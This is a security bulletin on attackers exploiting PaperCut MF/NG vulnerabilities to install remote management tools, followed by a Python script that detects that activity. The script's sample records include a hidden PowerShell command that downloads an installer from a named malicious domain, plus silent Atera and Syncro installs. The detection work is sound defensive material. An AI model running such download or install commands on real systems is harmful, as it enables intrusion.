H-ISAC TLP White Vulnerability Bulletin: PaperCut Vulnerability Exploitation, April 24, 2023

On April 24, 2023, reports circulated that attackers were exploiting severe vulnerabilities in the widely used PaperCut MF/NG print management software to compromise servers and then install the Atera remote management software on them.

PaperCut's print management software is widely used across many sectors, including large companies, government bodies and educational institutions, and it is compatible with most major printer brands and platforms. That broad footprint means a large population of exposed servers if the vulnerabilities are exploited.

The vulnerabilities, tracked as CVE-2023-27350 and CVE-2023-27351, both carry high severity scores in the National Vulnerability Database. The more serious of the two, CVE-2023-27350, allows a remote, unauthenticated attacker to bypass authentication and execute arbitrary code on an unpatched PaperCut server with SYSTEM privileges; CVE-2023-27351 allows an unauthenticated attacker to retrieve information about users stored in the server. PaperCut's advisory states that MF and NG versions 8.0 and later are affected and that the fixes ship in 20.1.7, 21.2.11 and 22.0.9; a server that cannot be patched immediately should at least have access to its web management interface restricted to trusted addresses.

According to PaperCut, evidence strongly suggests that the vulnerabilities are being exploited in the wild. A public proof-of-concept (PoC) exploit for CVE-2023-27350 has since been released, giving attackers a ready means of bypassing authentication and executing code on unpatched servers. The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2023-27350 to its Known Exploited Vulnerabilities (KEV) catalog.

Security researchers have tracked the activity since April 16 and observed threat actors using the vulnerability to run PowerShell commands from the PaperCut server that install legitimate remote management tools, including Atera and Syncro.

The malicious activity was preceded by the registration of the windowservicecenter[.]com domain on April 12, which was also used to host and deliver the TrueBot downloader, malware linked to the Silence cybercrime group and used to deploy Clop ransomware payloads since December 2022.
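The two preceding paragraphs give defenders three concrete things to hunt for: the PaperCut server process launching PowerShell, remote management agents (Atera, Syncro) being installed from that context, and lookups of the windowservicecenter[.]com domain. The following triage script is an added example, not code from H-ISAC, AHA or PaperCut, that runs those checks over Sysmon-style process-creation records and DNS query records. It assumes the PaperCut application server runs as pc-app.exe (confirm the service binary in your own deployment), and every log record in it is constructed for illustration.

```python
"""
Triage helper for the PaperCut post-exploitation activity described above.
Scans process-creation records (Sysmon Event ID 1 style fields) and DNS
query records for: the PaperCut server spawning a shell, RMM agent installs
(Atera, Syncro) from that context, and lookups of windowservicecenter[.]com.

Added example, not H-ISAC/AHA or PaperCut code. Assumption: the PaperCut
application server runs as pc-app.exe. All records below are constructed.
"""
import re
from dataclasses import dataclass, field

# Domain named in the bulletin, kept defanged in source and un-defanged for matching.
IOC_DOMAINS = {"windowservicecenter[.]com".replace("[.]", ".")}
PAPERCUT_SERVER_IMAGES = {"pc-app.exe"}          # assumption, see docstring
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe"}
RMM_MARKERS = re.compile(r"atera|syncro", re.IGNORECASE)


@dataclass
class Finding:
    severity: str        # "high" or "medium"
    reason: str
    record: dict = field(repr=False)


def _basename(path):
    """Lower-cased file name of a Windows path ('C:\\x\\y.exe' -> 'y.exe')."""
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def _matches_ioc_domain(name):
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in IOC_DOMAINS)


def check_process_event(ev):
    """Findings for one process-creation record."""
    parent = _basename(ev.get("ParentImage", ""))
    image = _basename(ev.get("Image", ""))
    cmdline = ev.get("CommandLine", "")
    findings = []

    # 1. The print server has no business launching a shell.
    if parent in PAPERCUT_SERVER_IMAGES and image in SHELL_IMAGES:
        findings.append(Finding("high", f"{parent} spawned {image}", ev))

    # 2. The command line references the bulletin's staging domain.
    for token in re.findall(r"[\w.-]+\.[a-z]{2,}", cmdline.lower()):
        if _matches_ioc_domain(token):
            findings.append(Finding("high", f"command line references IOC domain {token}", ev))
            break

    # 3. RMM agent install: high when PaperCut launched it, medium when a shell
    #    is involved (admins also install these tools, so review rather than alert).
    if RMM_MARKERS.search(cmdline):
        if parent in PAPERCUT_SERVER_IMAGES:
            findings.append(Finding("high", "RMM agent install launched by PaperCut server", ev))
        elif parent in SHELL_IMAGES or image in SHELL_IMAGES:
            findings.append(Finding("medium", "RMM agent install launched via shell", ev))
    return findings


def check_dns_event(ev):
    """Findings for one DNS query record."""
    name = ev.get("QueryName", "")
    if _matches_ioc_domain(name):
        return [Finding("high", f"DNS lookup of IOC domain {name}", ev)]
    return []


def triage(events):
    """Dispatch each record to the check for its 'type' and collect findings."""
    checks = {"process": check_process_event, "dns": check_dns_event}
    findings = []
    for ev in events:
        findings.extend(checks.get(ev.get("type"), lambda _: [])(ev))
    return findings


def severity_counts(findings):
    counts = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {"type": "process",
     "ParentImage": r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -nop -w hidden -c "Invoke-WebRequest '
                    'http://windowservicecenter.com/a.msi -OutFile a.msi"'},
    {"type": "process",                                     # benign admin use
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Service"},
    {"type": "process",
     "ParentImage": r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /i AteraAgent.msi /qn"},
    {"type": "process",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /i SyncroSetup.msi /qn"},
    {"type": "dns", "QueryName": "windowservicecenter.com"},
    {"type": "dns", "QueryName": "example.com"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.reason}")
```

Against the constructed records the script raises four high findings (the shell spawned by pc-app.exe, the staging domain in its command line, the Atera install launched by pc-app.exe, and the DNS lookup) and one medium finding for the Syncro install launched from cmd.exe, while the explorer.exe-launched PowerShell session is left alone. Feed it your own exported Sysmon and DNS logs by mapping the field names, and treat the RMM tiering as a starting point: a PaperCut server should almost never be the parent of an installer, but an administrator's shell often is.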

View the detailed report below.

For help with Cybersecurity and Risk Advisory Services exclusively for AHA members, contact:

John Riggi

National Advisor for Cybersecurity and Risk, AHA

jriggi@aha.org

(O) +1 202 626 2272